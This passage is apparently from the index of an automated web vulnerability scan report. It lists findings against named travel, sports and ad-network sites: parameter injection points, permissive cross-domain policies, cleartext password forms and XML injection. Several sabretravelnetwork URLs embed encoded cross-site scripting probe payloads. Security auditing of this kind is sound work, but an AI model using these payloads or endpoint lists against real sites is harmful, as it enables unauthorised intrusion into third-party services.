4.320. https://www.hotelplanner.com/Accept/Reserve.cfm [supplierType parameter]

4.321. https://www.hotelplanner.com/Accept/Reserve.cfm [taxRate parameter]

4.322. http://www.hotwire.com/hotel/results.jsp [REST URL parameter 1]

4.323. http://www.igougo.com/WebResource.axd [d parameter]

4.324. http://www.igougo.com/WebResource.axd [name of an arbitrarily supplied request parameter]

4.325. http://www.igougo.com/WebResource.axd [t parameter]

4.326. http://www.igougo.com/traveldeals/ratefinder.aspx [REST URL parameter 1]

4.327. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.328. http://www.igougo.com/traveldeals/ratefinder.aspx [SourceID parameter]

4.329. http://www.igougo.com/traveldeals/ratefinder.aspx [TypeID parameter]

4.330. http://www.igougo.com/traveldeals/ratefinder.aspx [adlt parameter]

4.331. http://www.igougo.com/traveldeals/ratefinder.aspx [dest parameter]

4.332. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.333. http://www.igougo.com/traveldeals/ratefinder.aspx [end parameter]

4.334. http://www.igougo.com/traveldeals/ratefinder.aspx [endDate parameter]

4.335. http://www.igougo.com/traveldeals/ratefinder.aspx [name of an arbitrarily supplied request parameter]

4.336. http://www.igougo.com/traveldeals/ratefinder.aspx [rm parameter]

4.337. http://www.igougo.com/traveldeals/ratefinder.aspx [strtDate parameter]

4.338. http://www.jscache.com/weimg [itype parameter]

4.339. http://www.luminate.com/widget/v3/53d1ac1014/event/1230a958301-1/taskbar/minimized/ [callback parameter]

4.340. http://www.luminate.com/widget/v3/metadata/ [callback parameter]

4.341. http://www.luminate.com/widget/v3/metadata/ [url parameter]

4.342. http://www.manutd.com/One-United/Login.aspx [redirectPath parameter]

4.343. http://www.manutd.com/Search-Results.aspx [catTxt parameter]

4.344. http://www.manutd.com/Search-Results.aspx [searchText parameter]

4.345. http://www.mufoundation.org/Search.aspx [search parameter]

4.346. http://www.mufoundation.org/Search.aspx [search parameter]

4.347. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.348. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.349. http://www.orbitz.com/App/SubmitQuickSearch [destination parameter]

4.350. http://www.orbitz.com/App/SubmitQuickSearch [origin parameter]

4.351. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.352. http://www.sabretravelnetwork.com/home [REST URL parameter 1]

4.353. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.354. http://www.sabretravelnetwork.com/home/ [REST URL parameter 1]

4.355. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.356. http://www.sabretravelnetwork.com/home/products_services/product_index/ [REST URL parameter 1]

4.357. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.358. http://www.sabretravelnetwork.com/home/products_services/product_index/ [name of an arbitrarily supplied request parameter]

4.359. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.360. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [REST URL parameter 1]

4.361. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.362. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/ [name of an arbitrarily supplied request parameter]

4.363. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.364. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [REST URL parameter 1]

4.365. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.366. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.367. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.368. http://www.sabretravelnetwork.com/home/search/show_results [REST URL parameter 1]

4.369. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.370. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

4.371. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.372. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

4.373. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.374. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

4.375. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.376. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.377. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.378. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

4.379. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.380. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 2]

4.381. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.382. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 3]

4.383. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.384. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 4]

4.385. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.386. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 5]

4.387. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.388. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.389. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.390. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 1]

4.391. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.392. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 2]

4.393. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.394. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 3]

4.395. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.396. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 4]

4.397. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.398. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]

4.399. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.400. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

4.401. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.402. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]

4.403. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.404. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]

4.405. http://www.travel-ticker.com/Destination/ [bid parameter]

4.406. http://www.travel-ticker.com/Destination/ [sid parameter]

4.407. http://www.travel-ticker.com/altcategory.jsp [bid parameter]

4.408. http://www.travel-ticker.com/altcategory.jsp [categoryName parameter]

4.409. http://www.travelocity.com/popWindow2 [dest parameter]

4.410. http://www.travelocity.com/popWindow2 [fromDate parameter]

4.411. http://www.travelocity.com/popWindow2 [fromMonth parameter]

4.412. http://www.travelocity.com/popWindow2 [fromYear parameter]

4.413. http://www.travelocity.com/popWindow2 [noOfAdults parameter]

4.414. http://www.travelocity.com/popWindow2 [toDate parameter]

4.415. http://www.travelocity.com/popWindow2 [toMonth parameter]

4.416. http://www.travelocity.com/popWindow2 [toYear parameter]

4.417. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [pubid parameter]

4.418. http://www9.effectivemeasure.net/v4/em_js [ns parameter]

4.419. http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283 [Referer HTTP header]

4.420. http://www.turkishairlines.com/static/css/ui-lightness/jquery-ui-1.8.14.custom.css [Referer HTTP header]

4.421. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p108883753 cookie]

4.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p109848095 cookie]

4.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]

4.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p63514475 cookie]

4.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.429. http://www.travelocity.com/ [SID cookie]

4.430. http://www.travelocity.com/ [TVLY_GEO cookie]

4.431. http://www.travelocity.com/472a [SID cookie]

4.432. http://www.travelocity.com/472a [TVLY_GEO cookie]

4.433. http://www.travelocity.com/resolve/default [SID cookie]

4.434. http://www.travelocity.com/resolve/default [TVLY_GEO cookie]

4.435. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js [drft cookie]

5. Flash cross-domain policy

5.1. http://a.collective-media.net/crossdomain.xml

5.2. http://ad-dc2.adtech.de/crossdomain.xml

5.3. http://ad.doubleclick.net/crossdomain.xml

5.4. http://ad.turn.com/crossdomain.xml

5.5. http://ad4.liverail.com/crossdomain.xml

5.6. http://ads.pointroll.com/crossdomain.xml

5.7. http://adserver.adtech.de/crossdomain.xml

5.8. http://aka-cdn-ns.adtech.de/crossdomain.xml

5.9. http://aperture.displaymarketplace.com/crossdomain.xml

5.10. http://b.scorecardresearch.com/crossdomain.xml

5.11. http://bcp.crwdcntrl.net/crossdomain.xml

5.12. http://beacon.securestudies.com/crossdomain.xml

5.13. http://c.betrad.com/crossdomain.xml

5.14. http://cacheserve.williamhill.com/crossdomain.xml

5.15. http://cas.criteo.com/crossdomain.xml

5.16. http://cdn.flashtalking.com/crossdomain.xml

5.17. http://cdn.turn.com/crossdomain.xml

5.18. http://d.tradex.openx.com/crossdomain.xml

5.19. http://dev.virtualearth.net/crossdomain.xml

5.20. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml

5.21. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml

5.22. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml

5.23. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml

5.24. http://ehg-twi.hitbox.com/crossdomain.xml

5.25. http://ff.connextra.com/crossdomain.xml

5.26. http://hits.guardian.co.uk/crossdomain.xml

5.27. http://ib.adnxs.com/crossdomain.xml

5.28. http://idpix.media6degrees.com/crossdomain.xml

5.29. http://js.revsci.net/crossdomain.xml

5.30. http://kantarmedia.guardian.co.uk/crossdomain.xml

5.31. http://l.betrad.com/crossdomain.xml

5.32. http://m.xp1.ru4.com/crossdomain.xml

5.33. http://media.fastclick.net/crossdomain.xml

5.34. http://oas.guardian.co.uk/crossdomain.xml

5.35. http://openx.px.invitemedia.com/crossdomain.xml

5.36. http://panel.kantarmedia.com/crossdomain.xml

5.37. http://pix04.revsci.net/crossdomain.xml

5.38. http://pixel.quantserve.com/crossdomain.xml

5.39. http://premiumtv.122.2o7.net/crossdomain.xml

5.40. http://r.turn.com/crossdomain.xml

5.41. http://rs.gwallet.com/crossdomain.xml

5.42. http://s0.2mdn.net/crossdomain.xml

5.43. http://secure-uk.imrworldwide.com/crossdomain.xml

5.44. https://secure.mlb.com/crossdomain.xml

5.45. http://serve.williamhill.com/crossdomain.xml

5.46. http://servedby.flashtalking.com/crossdomain.xml

5.47. http://speed.pointroll.com/crossdomain.xml

5.48. http://stat.flashtalking.com/crossdomain.xml

5.49. http://sync.mathtag.com/crossdomain.xml

5.50. http://tags.bluekai.com/crossdomain.xml

5.51. http://vox-static.liverail.com/crossdomain.xml

5.52. http://www.luminate.com/crossdomain.xml

5.53. http://www.manutd.com/crossdomain.xml

5.54. http://www.premierleague.com/crossdomain.xml

5.55. http://www9.effectivemeasure.net/crossdomain.xml

5.56. http://xml.eplayer.performgroup.com/crossdomain.xml

5.57. http://xml.premierleague.com/crossdomain.xml

5.58. http://adadvisor.net/crossdomain.xml

5.59. http://cookex.amp.yahoo.com/crossdomain.xml

5.60. http://googleads.g.doubleclick.net/crossdomain.xml

5.61. http://optimized-by.rubiconproject.com/crossdomain.xml

5.62. http://resource.guim.co.uk/crossdomain.xml

5.63. http://www.goal.com/crossdomain.xml

5.64. http://www.guardian.co.uk/crossdomain.xml

5.65. http://matcher-cwb.bidder7.mookie1.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad4.liverail.com/clientaccesspolicy.xml

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

6.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.5. http://beacon.securestudies.com/clientaccesspolicy.xml

6.6. http://dev.virtualearth.net/clientaccesspolicy.xml

6.7. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

6.8. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

6.9. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

6.11. http://hits.guardian.co.uk/clientaccesspolicy.xml

6.12. http://pixel.quantserve.com/clientaccesspolicy.xml

6.13. http://premiumtv.122.2o7.net/clientaccesspolicy.xml

6.14. http://s0.2mdn.net/clientaccesspolicy.xml

6.15. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml

6.16. http://speed.pointroll.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

7.2. http://www.hotelplanner.com/Search/Index.cfm

7.3. http://www.manutd.com/

7.4. http://www.manutd.com/One-United/Login.aspx

7.5. http://www.manutd.com/One-United/Login.aspx

7.6. http://www.manutd.com/Search-Results.aspx

7.7. http://www.manutd.com/en.aspx

7.8. http://www.manutd.com/en/Club/Sponsors.aspx

7.9. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

7.10. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

7.11. http://www.manutd.com/en/One-United.aspx

7.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

8. XML injection

8.1. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 1]

8.2. http://ak-static.hotwirestatic.com/static/deploy/ [REST URL parameter 2]

8.3. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 1]

8.4. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 2]

8.5. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 3]

8.6. http://ak-static.hotwirestatic.com/static/deploy/css/BedTypeSelectionComp.css [REST URL parameter 4]

8.7. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 1]

8.8. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 2]

8.9. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 3]

8.10. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 4]

8.11. http://ak-static.hotwirestatic.com/static/deploy/css/car/CarAddOnComp.css [REST URL parameter 5]

8.12. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 1]

8.13. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 2]

8.14. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 3]

8.15. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 4]

8.16. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 5]

8.17. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsMapContainerComp.css [REST URL parameter 6]

8.18. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 1]

8.19. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 2]

8.20. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 3]

8.21. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 4]

8.22. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 5]

8.23. http://ak-static.hotwirestatic.com/static/deploy/css/hotel/details/hotelDetailsPrint.css [REST URL parameter 6]

8.24. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 1]

8.25. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 2]

8.26. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 3]

8.27. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 4]

8.28. http://ak-static.hotwirestatic.com/static/deploy/javascript/car/CarAddOnComp.js [REST URL parameter 5]

8.29. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 1]

8.30. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 2]

8.31. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 3]

8.32. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 4]

8.33. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 5]

8.34. http://ak-static.hotwirestatic.com/static/deploy/javascript/core/comp/HwTilesComp.js [REST URL parameter 6]

8.35. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 1]

8.36. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 2]

8.37. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 3]

8.38. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 4]

8.39. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 5]

8.40. http://ak-static.hotwirestatic.com/static/deploy/javascript/hotel/details/HotelDetailsMapContainerComp.js [REST URL parameter 6]

8.41. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 1]

8.42. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 2]

8.43. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 3]

8.44. http://ak-static.hotwirestatic.com/static/images/buttons/btn-book-now-large.gif [REST URL parameter 4]

8.45. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 1]

8.46. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 2]

8.47. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 3]

8.48. http://ak-static.hotwirestatic.com/static/images/buttons/btn-submit2.png [REST URL parameter 4]

8.49. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 1]

8.50. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 2]

8.51. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 3]

8.52. http://ak-static.hotwirestatic.com/static/images/car-add-on/img-car-type-selector-OFF-new.png [REST URL parameter 4]

8.53. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 1]

8.54. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 2]

8.55. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 3]

8.56. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 4]

8.57. http://ak-static.hotwirestatic.com/static/images/core/background/208x3-grid-bg.gif [REST URL parameter 5]

8.58. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 1]

8.59. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 2]

8.60. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 3]

8.61. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 4]

8.62. http://ak-static.hotwirestatic.com/static/images/core/map/img_poi.png [REST URL parameter 5]

8.63. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 1]

8.64. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 2]

8.65. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 3]

8.66. http://ak-static.hotwirestatic.com/static/images/customer-care/blue_arrow_min.gif [REST URL parameter 4]

8.67. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 1]

8.68. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 2]

8.69. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 3]

8.70. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 4]

8.71. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-and-left-corner.gif [REST URL parameter 5]

8.72. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 1]

8.73. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 2]

8.74. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 3]

8.75. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 4]

8.76. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-bottom-right-corner.gif [REST URL parameter 5]

8.77. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 1]

8.78. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 2]

8.79. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 3]

8.80. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 4]

8.81. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-left-side.gif [REST URL parameter 5]

8.82. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 1]

8.83. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 2]

8.84. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 3]

8.85. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 4]

8.86. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-module-right-side.gif [REST URL parameter 5]

8.87. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 1]

8.88. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 2]

8.89. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 3]

8.90. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 4]

8.91. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-and-left-corner.gif [REST URL parameter 5]

8.92. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 1]

8.93. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 2]

8.94. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 3]

8.95. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 4]

8.96. http://ak-static.hotwirestatic.com/static/images/global/background/sidebar-title-module-top-right-corner.gif [REST URL parameter 5]

8.97. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 1]

8.98. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 2]

8.99. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 3]

8.100. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 4]

8.101. http://ak-static.hotwirestatic.com/static/images/global/bullets/red-bullet-img.gif [REST URL parameter 5]

8.102. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 1]

8.103. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 2]

8.104. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 3]

8.105. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 4]

8.106. http://ak-static.hotwirestatic.com/static/images/global/buttons/promo-button-red.gif [REST URL parameter 5]

8.107. http://ak-static.hotwirestatic.com/static/images/hotel/details/about-your-hotel-headline.gif [REST URL parameter 1]

